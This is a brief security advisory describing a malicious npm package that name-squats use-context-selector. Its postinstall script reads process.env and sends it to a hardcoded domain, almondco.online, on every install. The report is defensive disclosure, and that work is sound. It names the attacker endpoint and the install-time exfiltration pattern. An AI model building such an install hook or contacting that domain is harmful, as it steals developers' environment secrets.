This package is a name-squat of the popular use-context-selector library and ships a postinstall script (dist/postinstall.js / src/postinstall.js) that, on npm install, reads process.env and beacons to the hardcoded endpoint https://almondco.online via https.get. The endpoint is unrelated to any published use-context-selector author or infrastructure and is hardcoded in the install-lifecycle script. The combination of (a) name confusion against an established library, (b) a postinstall hook firing without consent on every npm install, (c) reads of process.env, and (d) outbound HTTPS to an attacker-controlled domain matches the standard install-time environment-exfiltration pattern.